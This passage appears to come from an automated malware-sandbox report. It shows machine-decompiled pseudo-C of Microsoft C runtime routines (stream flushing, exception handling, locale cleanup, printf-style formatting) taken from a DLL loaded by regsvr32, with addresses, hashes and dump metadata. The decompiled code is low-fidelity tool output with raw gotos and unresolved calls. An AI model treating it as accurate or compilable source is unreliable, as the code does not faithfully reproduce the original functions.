                                                  				0xf9d29300();
                                                  				_v20 = 0;
                                                  				_v20 = _v20 + 1;
                                                  				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
                                                  				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
                                                  				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
                                                  				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                  				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
                                                  				if (_a8 != 1) goto 0xf9d3ffe1;
                                                  				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
                                                  				_v24 = _v24 + 1;
                                                  				goto 0xf9d40024;
                                                  				if (_a8 != 0) goto 0xf9d40024;
                                                  				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
                                                  				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
                                                  				_v16 = 0xffffffff;
                                                  				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                                  				goto L1;
                                                  				__ecx = 1;
                                                  				__eax = E000007FE7FEF9D29360(__eax, 1);
                                                  				if (_a8 != 1) goto 0xf9d4005b;
                                                  				__eax = _v24;
                                                  				goto 0xf9d4005f;
                                                  				__eax = _v16;
                                                  				return _v16;
                                                  			}






                                                  0x7fef9d3ff00
                                                  0x7fef9d3ff08
                                                  0x7fef9d3ff10
                                                  0x7fef9d3ff1d
                                                  0x7fef9d3ff23
                                                  0x7fef9d3ff33
                                                  0x7fef9d3ff41
                                                  0x7fef9d3ff58
                                                  0x7fef9d3ff78
                                                  0x7fef9d3ff92
                                                  0x7fef9d3ffb2
                                                  0x7fef9d3ffb9
                                                  0x7fef9d3ffd3
                                                  0x7fef9d3ffdb
                                                  0x7fef9d3ffdf
                                                  0x7fef9d3ffe6
                                                  0x7fef9d40000
                                                  0x7fef9d4001a
                                                  0x7fef9d4001c
                                                  0x7fef9d40038
                                                  0x7fef9d4003d
                                                  0x7fef9d40042
                                                  0x7fef9d40047
                                                  0x7fef9d40051
                                                  0x7fef9d40053
                                                  0x7fef9d40059
                                                  0x7fef9d4005b
                                                  0x7fef9d40063

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                                  • String ID:
                                                  • API String ID: 1144694634-0
                                                  • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                  • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                                  • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                                  • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                  				long long _v16;
                                                  				long long _v24;
                                                  				intOrPtr _v32;
                                                  				long long _v40;
                                                  				long long _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v56;
                                                  				signed int _v64;
                                                  				long long _v72;
                                                  				char _v80;
                                                  				long long _v88;
                                                  				void* _t135;
                                                  				void* _t145;
                                                  				void* _t147;
                                                  				void* _t148;
                                                  				void* _t149;
                                                  				signed int* _t200;
                                                  				intOrPtr _t206;
                                                  
                                                  				_a32 = __r9;
                                                  				_a24 = __r8;
                                                  				_a16 = __rdx;
                                                  				_a8 = __rcx;
                                                  				0xf9d24000();
                                                  				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
                                                  				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
                                                  				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
                                                  				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
                                                  				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
                                                  				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
                                                  				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
                                                  				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
                                                  				goto 0xf9d3409c;
                                                  				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
                                                  				if (_a40[1] == 0) goto 0xf9d33ee4;
                                                  				if (_a48 != 0) goto 0xf9d33ee4;
                                                  				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
                                                  				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
                                                  				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                                  				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
                                                  				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
                                                  				goto 0xf9d33e0f;
                                                  				E000007FE7FEF9D2CF80(_a40);
                                                  				r9d = _v56;
                                                  				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
                                                  				goto 0xf9d33ec7;
                                                  				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
                                                  				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
                                                  				_v48 = _a8;
                                                  				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                                  				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
                                                  				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
                                                  				goto 0xf9d33e9a;
                                                  				E000007FE7FEF9D2CF80(_a40);
                                                  				r9d = _v52;
                                                  				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                                  				goto 0xf9d3409c;
                                                  				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                                  				goto 0xf9d34097;
                                                  				if (_a40[3] != 0) goto 0xf9d33f59;
                                                  				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
                                                  				_t200 = _a40;
                                                  				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
                                                  				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
                                                  				_v24 = _t200 + _a40[8];
                                                  				goto 0xf9d33f4d;
                                                  				_v24 = 0;
                                                  				if (_v24 == 0) goto 0xf9d34097;
                                                  				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
                                                  				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
                                                  				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                                  				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
                                                  				E000007FE7FEF9D2E6A0(_t135, _t206);
                                                  				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                                  				goto 0xf9d33fce;
                                                  				_v16 = 0;
                                                  				_v40 = _v16;
                                                  				_t177 = _v40;
                                                  				if (_v40 == 0) goto 0xf9d34041;
                                                  				_v64 = _a64 & 0x000000ff;
                                                  				_v72 = _a56;
                                                  				_v80 = _a48;
                                                  				_v88 = _a40;
                                                  				_v32 = _v40();
                                                  				goto 0xf9d34097;
                                                  				_v64 = _a56;
                                                  				_v72 = _a48;
                                                  				_v80 = _a64 & 0x000000ff;
                                                  				_v88 = _a40;
                                                  				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                                  				return 1;
                                                  			}





















                                                  0x7fef9d33cc0
                                                  0x7fef9d33cc5
                                                  0x7fef9d33cca
                                                  0x7fef9d33ccf
                                                  0x7fef9d33cd8
                                                  0x7fef9d33ce4
                                                  0x7fef9d33cf8
                                                  0x7fef9d33d08
                                                  0x7fef9d33d16
                                                  0x7fef9d33d28
                                                  0x7fef9d33d38
                                                  0x7fef9d33d4e
                                                  0x7fef9d33d60
                                                  0x7fef9d33d67
                                                  0x7fef9d33d7c
                                                  0x7fef9d33d8e
                                                  0x7fef9d33d9c
                                                  0x7fef9d33db2
                                                  0x7fef9d33dc6
                                                  0x7fef9d33dec
                                                  0x7fef9d33df5
                                                  0x7fef9d33e06
                                                  0x7fef9d33e08
                                                  0x7fef9d33e0a
                                                  0x7fef9d33e0f
                                                  0x7fef9d33e2c
                                                  0x7fef9d33e3b
                                                  0x7fef9d33e50
                                                  0x7fef9d33e60
                                                  0x7fef9d33e6a
                                                  0x7fef9d33e77
                                                  0x7fef9d33e80
                                                  0x7fef9d33e91
                                                  0x7fef9d33e93
                                                  0x7fef9d33e95
                                                  0x7fef9d33e9a
                                                  0x7fef9d33eb8
                                                  0x7fef9d33ec2
                                                  0x7fef9d33edf
                                                  0x7fef9d33eee
                                                  0x7fef9d33eff
                                                  0x7fef9d33f15
                                                  0x7fef9d33f1b
                                                  0x7fef9d33f27
                                                  0x7fef9d33f29
                                                  0x7fef9d33f3d
                                                  0x7fef9d33f42
                                                  0x7fef9d33f44
                                                  0x7fef9d33f53
                                                  0x7fef9d33f67
                                                  0x7fef9d33f79
                                                  0x7fef9d33f8e
                                                  0x7fef9d33f9c
                                                  0x7fef9d33fa4
                                                  0x7fef9d33fa6
                                                  0x7fef9d33fbe
                                                  0x7fef9d33fc3
                                                  0x7fef9d33fc5
                                                  0x7fef9d33fd3
                                                  0x7fef9d33fd8
                                                  0x7fef9d33fde
                                                  0x7fef9d33fe8
                                                  0x7fef9d33ff4
                                                  0x7fef9d34000
                                                  0x7fef9d3400c
                                                  0x7fef9d34035
                                                  0x7fef9d3403f
                                                  0x7fef9d34049
                                                  0x7fef9d34055
                                                  0x7fef9d34061
                                                  0x7fef9d3406d
                                                  0x7fef9d34092
                                                  0x7fef9d340a0

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _inconsistency
                                                  • String ID: csm$csm
                                                  • API String ID: 32975420-3733052814
                                                  • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                  • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                                  • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                  • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                                  • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: __free_lconv_mon__free_lconv_num
                                                  • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                  • API String ID: 2148069796-2706031433
                                                  • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                  • Instruction ID: 7353ab124090f0710997c18079ef38eae00693e27689a0bfa21a481d68f00224
                                                  • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                  • Instruction Fuzzy Hash: F4A10E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                  • API String ID: 2123368286-3717698799
                                                  • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                  • Instruction ID: b28b411edc77ea5f57a42c4ce070c51137fe1cd7001121a3be123fc4e483bd38
                                                  • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                  • Instruction Fuzzy Hash: FC810D32A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 20%
                                                  			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                  				signed int _t212;
                                                  				signed char _t217;
                                                  				intOrPtr _t252;
                                                  				signed int _t327;
                                                  				signed int _t328;
                                                  				signed long long _t331;
                                                  				intOrPtr* _t354;
                                                  				signed long long _t379;
                                                  
                                                  				_t327 = __rax;
                                                  				_a708 = 0x27;
                                                  				_a72 = 0x10;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                  				_a84 = 0x30;
                                                  				_a85 = _a708 + 0x51;
                                                  				_a92 = 2;
                                                  				_a72 = 8;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                  				asm("bts eax, 0x9");
                                                  				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                  				E000007FE7FEF9D31EA0( &_a1112);
                                                  				_a824 = _t327;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                  				E000007FE7FEF9D31EA0( &_a1112);
                                                  				_a824 = _t327;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                  				_t328 = E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t328;
                                                  				goto 0xf9d3c80e;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t328;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t328;
                                                  				goto 0xf9d3c84b;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t328;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                  				if (_a824 >= 0) goto 0xf9d3c882;
                                                  				_a832 =  ~_a824;
                                                  				asm("bts eax, 0x8");
                                                  				goto 0xf9d3c892;
                                                  				_t331 = _a824;
                                                  				_a832 = _t331;
                                                  				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                  				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                  				_a832 = _a832 & _t331;
                                                  				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                  				_a116 = 1;
                                                  				goto 0xf9d3c8f5;
                                                  				_a80 = _a80 & 0xfffffff7;
                                                  				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                  				_a116 = 0x200;
                                                  				if (_a832 != 0) goto 0xf9d3c908;
                                                  				_a92 = 0;
                                                  				_a64 =  &_a687;
                                                  				_t212 = _a116;
                                                  				_a116 = _a116 - 1;
                                                  				if (_t212 > 0) goto 0xf9d3c936;
                                                  				if (_a832 == 0) goto 0xf9d3c9d3;
                                                  				_a1040 = _a72;
                                                  				_a816 = _t212 / _a1040 + 0x30;
                                                  				_a1048 = _a72;
                                                  				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                  				_t217 = _a816 + _a708;
                                                  				_a816 = _t217;
                                                  				 *_a64 = _a816 & 0x000000ff;
                                                  				_a64 = _a64 - 1;
                                                  				goto 0xf9d3c915;
                                                  				_a104 = _t217;
                                                  				_a64 = _a64 + 1;
                                                  				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                  				if (_a104 == 0) goto 0xf9d3ca12;
                                                  				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                  				_a64 = _a64 - 1;
                                                  				 *_a64 = 0x30;
                                                  				_a104 = _a104 + 1;
                                                  				if (_a108 != 0) goto 0xf9d3cc6e;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                  				_a84 = 0x2d;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                  				_a84 = 0x2b;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                  				_a84 = 0x20;
                                                  				_a92 = 1;
                                                  				_a840 = _a88 - _a104 - _a92;
                                                  				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                  				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                  				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                  				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                  				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                  				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                  				if (_a76 == 0) goto 0xf9d3cc1d;
                                                  				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                  				_a872 = 0;
                                                  				_a848 = _a64;
                                                  				_a856 = _a104;
                                                  				_a856 = _a856 - 1;
                                                  				if (_a856 == 0) goto 0xf9d3cc1b;
                                                  				_a1056 =  *_a848 & 0x0000ffff;
                                                  				r9d = _a1056 & 0x0000ffff;
                                                  				r8d = 6;
                                                  				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                  				_a848 =  &(_a848[1]);
                                                  				if (_a872 != 0) goto 0xf9d3cbe5;
                                                  				if (_a860 != 0) goto 0xf9d3cbf2;
                                                  				_a688 = 0xffffffff;
                                                  				goto 0xf9d3cc1b;
                                                  				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                  				goto 0xf9d3cb60;
                                                  				goto 0xf9d3cc3b;
                                                  				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                  				if (_a688 < 0) goto 0xf9d3cc6e;
                                                  				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                  				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                  				if (_a96 == 0) goto 0xf9d3cc8e;
                                                  				0xf9d25330();
                                                  				_a96 = 0;
                                                  				goto 0xf9d3b99c;
                                                  				if (_a704 == 0) goto 0xf9d3ccb4;
                                                  				if (_a704 == 7) goto 0xf9d3ccb4;
                                                  				_a1060 = 0;
                                                  				goto 0xf9d3ccbf;
                                                  				_a1060 = 1;
                                                  				_t252 = _a1060;
                                                  				_a876 = _t252;
                                                  				if (_a876 != 0) goto 0xf9d3cd05;
                                                  				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                  				_a32 = _t354;
                                                  				r9d = 0;
                                                  				r8d = 0x8f5;
                                                  				0xf9d2b3b0();
                                                  				if (_t252 != 1) goto 0xf9d3cd05;
                                                  				asm("int3");
                                                  				if (_a876 != 0) goto 0xf9d3cd61;
                                                  				0xf9d2ab30();
                                                  				 *_t354 = 0x16;
                                                  				_a32 = 0;
                                                  				r9d = 0x8f5;
                                                  				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  				_a912 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				goto 0xf9d3cd80;
                                                  				_a916 = _a688;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  			}











                                                  0x7fef9d3c719
                                                  0x7fef9d3c719
                                                  0x7fef9d3c724
                                                  0x7fef9d3c737
                                                  0x7fef9d3c739
                                                  0x7fef9d3c748
                                                  0x7fef9d3c74c
                                                  0x7fef9d3c756
                                                  0x7fef9d3c769
                                                  0x7fef9d3c76f
                                                  0x7fef9d3c782
                                                  0x7fef9d3c78c
                                                  0x7fef9d3c791
                                                  0x7fef9d3c799
                                                  0x7fef9d3c7a9
                                                  0x7fef9d3c7b3
                                                  0x7fef9d3c7b8
                                                  0x7fef9d3c7c0
                                                  0x7fef9d3c7ce
                                                  0x7fef9d3c7d9
                                                  0x7fef9d3c7e8
                                                  0x7fef9d3c7ec
                                                  0x7fef9d3c7f4
                                                  0x7fef9d3c7fe
                                                  0x7fef9d3c806
                                                  0x7fef9d3c80e
                                                  0x7fef9d3c819
                                                  0x7fef9d3c823
                                                  0x7fef9d3c82a
                                                  0x7fef9d3c832
                                                  0x7fef9d3c83c
                                                  0x7fef9d3c843
                                                  0x7fef9d3c854
                                                  0x7fef9d3c85f
                                                  0x7fef9d3c86c
                                                  0x7fef9d3c878
                                                  0x7fef9d3c880
                                                  0x7fef9d3c882
                                                  0x7fef9d3c88a
                                                  0x7fef9d3c89d
                                                  0x7fef9d3c8aa
                                                  0x7fef9d3c8bf
                                                  0x7fef9d3c8cc
                                                  0x7fef9d3c8ce
                                                  0x7fef9d3c8d6
                                                  0x7fef9d3c8df
                                                  0x7fef9d3c8eb
                                                  0x7fef9d3c8ed
                                                  0x7fef9d3c8fe
                                                  0x7fef9d3c900
                                                  0x7fef9d3c910
                                                  0x7fef9d3c915
                                                  0x7fef9d3c91f
                                                  0x7fef9d3c925
                                                  0x7fef9d3c930
                                                  0x7fef9d3c93b
                                                  0x7fef9d3c95e
                                                  0x7fef9d3c96a
                                                  0x7fef9d3c997
                                                  0x7fef9d3c9a9
                                                  0x7fef9d3c9ab
                                                  0x7fef9d3c9bf
                                                  0x7fef9d3c9c9
                                                  0x7fef9d3c9ce
                                                  0x7fef9d3c9e0
                                                  0x7fef9d3c9ec
                                                  0x7fef9d3c9fc
                                                  0x7fef9d3ca03
                                                  0x7fef9d3ca10
                                                  0x7fef9d3ca1a
                                                  0x7fef9d3ca24
                                                  0x7fef9d3ca2d
                                                  0x7fef9d3ca36
                                                  0x7fef9d3ca45
                                                  0x7fef9d3ca52
                                                  0x7fef9d3ca54
                                                  0x7fef9d3ca59
                                                  0x7fef9d3ca61
                                                  0x7fef9d3ca6c
                                                  0x7fef9d3ca6e
                                                  0x7fef9d3ca73
                                                  0x7fef9d3ca7b
                                                  0x7fef9d3ca86
                                                  0x7fef9d3ca88
                                                  0x7fef9d3ca8d
                                                  0x7fef9d3caa5
                                                  0x7fef9d3cab5
                                                  0x7fef9d3cad0
                                                  0x7fef9d3caee
                                                  0x7fef9d3cafc
                                                  0x7fef9d3cb07
                                                  0x7fef9d3cb22
                                                  0x7fef9d3cb2c
                                                  0x7fef9d3cb37
                                                  0x7fef9d3cb3d
                                                  0x7fef9d3cb4d
                                                  0x7fef9d3cb59
                                                  0x7fef9d3cb70
                                                  0x7fef9d3cb79
                                                  0x7fef9d3cb8a
                                                  0x7fef9d3cb92
                                                  0x7fef9d3cb9b
                                                  0x7fef9d3cbb6
                                                  0x7fef9d3cbc9
                                                  0x7fef9d3cbd9
                                                  0x7fef9d3cbe3
                                                  0x7fef9d3cbe5
                                                  0x7fef9d3cbf0
                                                  0x7fef9d3cc11
                                                  0x7fef9d3cc16
                                                  0x7fef9d3cc1b
                                                  0x7fef9d3cc36
                                                  0x7fef9d3cc43
                                                  0x7fef9d3cc4e
                                                  0x7fef9d3cc69
                                                  0x7fef9d3cc74
                                                  0x7fef9d3cc80
                                                  0x7fef9d3cc85
                                                  0x7fef9d3cc8e
                                                  0x7fef9d3cc9b
                                                  0x7fef9d3cca5
                                                  0x7fef9d3cca7
                                                  0x7fef9d3ccb2
                                                  0x7fef9d3ccb4
                                                  0x7fef9d3ccbf
                                                  0x7fef9d3ccc6
                                                  0x7fef9d3ccd5
                                                  0x7fef9d3ccd7
                                                  0x7fef9d3ccde
                                                  0x7fef9d3cce3
                                                  0x7fef9d3cce6
                                                  0x7fef9d3ccf8
                                                  0x7fef9d3cd00
                                                  0x7fef9d3cd02
                                                  0x7fef9d3cd0d
                                                  0x7fef9d3cd0f
                                                  0x7fef9d3cd14
                                                  0x7fef9d3cd1a
                                                  0x7fef9d3cd23
                                                  0x7fef9d3cd3e
                                                  0x7fef9d3cd43
                                                  0x7fef9d3cd53
                                                  0x7fef9d3cd5f
                                                  0x7fef9d3cd68
                                                  0x7fef9d3cd74
                                                  0x7fef9d3cd97

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
